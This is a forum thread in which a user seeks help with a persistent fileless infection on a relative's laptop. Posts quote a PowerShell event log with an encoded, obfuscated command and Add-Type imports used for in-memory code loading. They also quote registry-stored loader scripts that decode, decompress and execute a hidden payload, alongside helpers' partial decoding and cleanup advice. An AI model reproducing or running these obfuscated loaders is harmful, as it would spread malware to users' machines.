CMD window flashes up every 9 minutes

enkoda · 22 Aug 2019 at 20:10

Father-in-law's laptop keeps flashing a cmd window up very quickly every 9 minutes - I can't seem to track down what's causing it, apart from a logged system event entry that ties in exactly time-wise.

The log shows the host application as "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -enc" and a shed load of gobbledeegook that means nothing to me (I can post it here if needed).

We've done the usual virus scanning, etc, and the only other remedy suggested is to use the system file checker which I guess will take forever...

Can anyone shed any light on what's causing it or how I track down what is?

enkoda · 22 Aug 2019 at 21:00

AHarvey said:
pop greenshot on the laptop, it's free screenshot software, hit print screen when it pops up and it kind of freezes the screen so you can grab a screen shot of it.

Is there anything set in the scheduler to run every 9 mins?

Have you googled it? https://www.bleepingcomputer.com/forums/t/621151/suspicions-powershell-activity/

Daft idea, but what would happen if you renamed the powershell.exe to powershell.exe_original?

I recorded the cmd window on my mobile and it just has the cmd.exe path in the title.

Task scheduler has nothing that corresponds to the times the window pops up - I checked about 60+ entries thinking something would show up, but surprise surprise, nothing....gggrrr!

The renaming idea I can try on Saturday - I guess it should throw up an error with the path to the offending item?

Google results seem to just give the typical fail-safe solution of re-installing Windows.

enkoda · 22 Aug 2019 at 21:53

bremen1874 said:
Post the full text of the log entry you mentioned on the open post.

Here it is:

Log Name: Windows PowerShell
Source: PowerShell
Date: 22/08/2019 19:45:51
Event ID: 800
Task Category: (8)
Level: Information
Keywords: Classic
User: N/A
Computer: *****-HP-Laptop
Description:
Pipeline execution details for command line: &("{1}{0}"-f 'e','Add-Typ') -TypeDefinition @"
.
Context Information:
DetailSequence=1
DetailTotal=1
SequenceNumber=15
UserId=*****-HP-Laptop\*****
HostName=ConsoleHost
HostVersion=5.1.17763.592
HostId=97e09156-8c1f-4501-82d2-aec7c56b1a2b
HostApplication=C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -enc JAB7AHIAYABFAEcAfQA9ACcASABLAEwATQAnADsAJAB7AHIARQBnAGAAUABgAEEAVABoAH0APQAnAEcAYwBSAGkATgA5AFoAbQA4ADMAJwA7ACQAewBSAGAAZQBnAGsAYABlAGAAeQBuAGEATQBlAH0APQAnADEASgBGAFQAdwBJAHMAOABPAGMAJwA7ACQAewBwAGEAUgBgAEEAbQB9AD0AJwBZAHEAbABzAHIAMQBQAGQAdgBqACcAOwAkAHsAZgBVAEwAYABMAFIARQBHAH0APQAkAHsAUgBgAEUARwB9ACsAKAAoACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADQAfQB7ADAAfQAiACAALQBmACcANABmADAAJwAsACcAOgA0AGYAMABTAG8AJwAsACcAZgAnACwAJwB0AHcAYQByACcALAAnAGUAJwApACkAIAAtAEMAcgBFAHAATABBAGMAZQAgACAAKABbAEMASABBAHIAXQA1ADIAKwBbAEMASABBAHIAXQAxADAAMgArAFsAQwBIAEEAcgBdADQAOAApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAHsAUgBFAGAAZwBQAEEAYABUAGgAfQA7ACQAewBFAFgAYABwAHIARQBgAHMAUwBgAEkAbwBuAH0APQAoACYAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBHACcALAAnAGUAJwAsACcAcABlAHIAdAB5ACcALAAnAHQALQBJAHQAZQBtAFAAcgBvACcAKQAgACQAewBmAFUAbABgAEwAYABSAEUARwB9ACkALgAkAHsAUABhAGAAUgBhAG0AfQA7AC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBlAHgAJwAsACcAaQAnACkAKAAkAHsARQBgAHgAcAByAGUAYABzAFMAYABpAG8AbgB9ACkA
EngineVersion=5.1.17763.592
RunspaceId=1d791aec-6d9a-4efa-89b8-261b7d1c7377
PipelineId=1
ScriptName=
CommandLine=&("{1}{0}"-f 'e','Add-Typ') -TypeDefinition @"
Details:
CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="TypeDefinition"; value="using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class Kernel32
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
[DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
public static extern IntPtr GetProcAddress(IntPtr hModule,string procName);
[DllImport("msvcrt.dll")]
public static extern IntPtr memcpy(IntPtr lpAddr,IntPtr lpSrcAddr, UIntPtr dwSize);
}"
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell" />
<EventID Qualifiers="0">800</EventID>
<Level>4</Level>
<Task>8</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2019-08-22T18:45:51.607422200Z" />
<EventRecordID>20702</EventRecordID>
<Channel>Windows PowerShell</Channel>
<Computer>*****-HP-Laptop</Computer>
<Security />
</System>
<EventData>
<Data>&("{1}{0}"-f 'e','Add-Typ') -TypeDefinition @"
</Data>
<Data> DetailSequence=1
DetailTotal=1
SequenceNumber=15
UserId=*****-HP-Laptop\*****
HostName=ConsoleHost
HostVersion=5.1.17763.592
HostId=97e09156-8c1f-4501-82d2-aec7c56b1a2b
HostApplication=C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -enc JAB7AHIAYABFAEcAfQA9ACcASABLAEwATQAnADsAJAB7AHIARQBnAGAAUABgAEEAVABoAH0APQAnAEcAYwBSAGkATgA5AFoAbQA4ADMAJwA7ACQAewBSAGAAZQBnAGsAYABlAGAAeQBuAGEATQBlAH0APQAnADEASgBGAFQAdwBJAHMAOABPAGMAJwA7ACQAewBwAGEAUgBgAEEAbQB9AD0AJwBZAHEAbABzAHIAMQBQAGQAdgBqACcAOwAkAHsAZgBVAEwAYABMAFIARQBHAH0APQAkAHsAUgBgAEUARwB9ACsAKAAoACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADQAfQB7ADAAfQAiACAALQBmACcANABmADAAJwAsACcAOgA0AGYAMABTAG8AJwAsACcAZgAnACwAJwB0AHcAYQByACcALAAnAGUAJwApACkAIAAtAEMAcgBFAHAATABBAGMAZQAgACAAKABbAEMASABBAHIAXQA1ADIAKwBbAEMASABBAHIAXQAxADAAMgArAFsAQwBIAEEAcgBdADQAOAApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAHsAUgBFAGAAZwBQAEEAYABUAGgAfQA7ACQAewBFAFgAYABwAHIARQBgAHMAUwBgAEkAbwBuAH0APQAoACYAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBHACcALAAnAGUAJwAsACcAcABlAHIAdAB5ACcALAAnAHQALQBJAHQAZQBtAFAAcgBvACcAKQAgACQAewBmAFUAbABgAEwAYABSAEUARwB9ACkALgAkAHsAUABhAGAAUgBhAG0AfQA7AC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBlAHgAJwAsACcAaQAnACkAKAAkAHsARQBgAHgAcAByAGUAYABzAFMAYABpAG8AbgB9ACkA
EngineVersion=5.1.17763.592
RunspaceId=1d791aec-6d9a-4efa-89b8-261b7d1c7377
PipelineId=1
ScriptName=
CommandLine=&("{1}{0}"-f 'e','Add-Typ') -TypeDefinition @"
</Data>
<Data>CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="TypeDefinition"; value="using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class Kernel32
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
[DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
public static extern IntPtr GetProcAddress(IntPtr hModule,string procName);
[DllImport("msvcrt.dll")]
public static extern IntPtr memcpy(IntPtr lpAddr,IntPtr lpSrcAddr, UIntPtr dwSize);
}"
</Data>
</EventData>
</Event>

I was hoping it would point to something like a filename or folder, but I'm not sure what any of this is telling me!

enkoda · 23 Aug 2019 at 07:59

Thanks everyone, consider the laptop nuked from orbit.

enkoda · 23 Aug 2019 at 08:06

hyperseven said:
Doing something with the registry?

Can I ask what sorcery you used to decipher that entry?

enkoda · 24 Aug 2019 at 11:16

jpaul said:
just online base64 decoder https://www.base64decode.net

should probably look at autoruns, - autoruns tool to see if you can see what is scheduling periodic execution.
edit: afterthought as SP said mlawarebytes should find these and is worth running to see if you can find out how infection occurred & avoid repetition . re-install obviously buries the evidence.

We'll have a go with mwb in a bit.

I guess though that even if we find out what the nasty is, working out how it got there is virtually impossible.

enkoda · 25 Aug 2019 at 17:02

bremen1874 said:
They've had fun further obfuscating the Base64 encoded command with regular expressions and character substitutions.

Part of it translates to 'HKLM\Software\'

there's also a 'Get-ItemProperty' in there.

If definitely worth checking the registry for 'Yqlsr1Pdvj'

Not sure what they're trying to achieve, but no legitimate task would be doing any of this. If you can't track down the cause be prepared to wipe and reinstall.

Had a hunt for that string and found it in this location:
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\GcRiN9Zm83

This entry - lMyBTkjA2c

LTOb3Z=['pnS','PSgs','u'][2];KCG7VIEcZ=['Bznw','un5Y','_fan','n'][3];isaS2qhuEX=fGEqwQg+LTOb3Z+KCG7VIEcZ;X3YqyZoEE[isaS2qhuEX]('C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'+['kGu2','BWH','KGR',' -e'][3]+'nc '+'JAB7AHIAYABFAEcAfQA9ACcASABLAEwATQAnADsAJAB7AHIARQBnAGAAUABgAEEAVABoAH0APQAnAEcAYwBSAGkATgA5AFoAbQA4ADMAJwA7ACQAewBSAGAAZQBnAGsAYABlAGAAeQBuAGEATQBlAH0APQAnADEASgBGAFQAdwBJAHMAOABPAGMAJwA7ACQAewBwAGEAUgBgAEEAbQB9AD0AJwBZAHEAbABzAHIAMQBQAGQAdgBqACcAOwAkAHsAZgBVAEwAYABMAFIARQBHAH0APQAkAHsAUgBgAEUARwB9ACsAKAAoACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADQAfQB7ADAAfQAiACAALQBmACcANABmADAAJwAsACcAOgA0AGYAMABTAG8AJwAsACcAZgAnACwAJwB0AHcAYQByACcALAAnAGUAJwApACkAIAAtAEMAcgBFAHAATABBAGMAZQAgACAAKABbAEMASABBAHIAXQA1ADIAKwBbAEMASABBAHIAXQAxADAAMgArAFsAQwBIAEEAcgBdADQAOAApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAHsAUgBFAGAAZwBQAEEAYABUAGgAfQA7ACQAewBFAFgAYABwAHIARQBgAHMAUwBgAEkAbwBuAH0APQAoACYAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBHACcALAAnAGUAJwAsACcAcABlAHIAdAB5ACcALAAnAHQALQBJAHQAZQBtAFAAcgBvACcAKQAgACQAewBmAFUAbABgAEwAYABSAEUARwB9ACkALgAkAHsAUABhAGAAUgBhAG0AfQA7AC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBlAHgAJwAsACcAaQAnACkAKAAkAHsARQBgAHgAcAByAGUAYABzAFMAYABpAG8AbgB9ACkA',[-1+1,239,-2289+2484][0],[95,731-545,174-174][2]);

and this one - Yqlsr1Pdvj

(NEW-OBJECT io.strEaMrEAdER((NEW-OBJECT SySteM.io.coMpressiOn.deflAtesTReaM([SysTem.iO.MEmOrYStREaM] [cOnverT]::FROMbASe64STrInG('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/

[...lots of data too long to list...]

/+B3z7/Jd8Rs0o+3pCJIdXTqA+2mLHTNw3SjloDj/yf5NS/IUyiK4+qjOMgBf8C2g/qDKWGvwiaHfUyYTSMb/PL/l/AA==') ,[sysTem.IO.COmPReSSiON.CompRessiOnmODE]:ECOMprESs)) ,[texT.encoDInG]::AScii)).rEADToeNd( ) | . ( $PsHoMe[4]+$pShOmE[30]+'x')

We've decided to reinstall just to be safe, but I'd be curious if this sheds any more light on what's causing it.

enkoda · 25 Aug 2019 at 17:20

Rroff said:
Without looking into it in more detail it looks like it might be a trojan that is trying to modify the internet access to redirect all traffic via a (malicious) proxy.

I could well be wrong on that though.

I can't understand how Norton and McAfee security suites let this happen?

^ not serious btw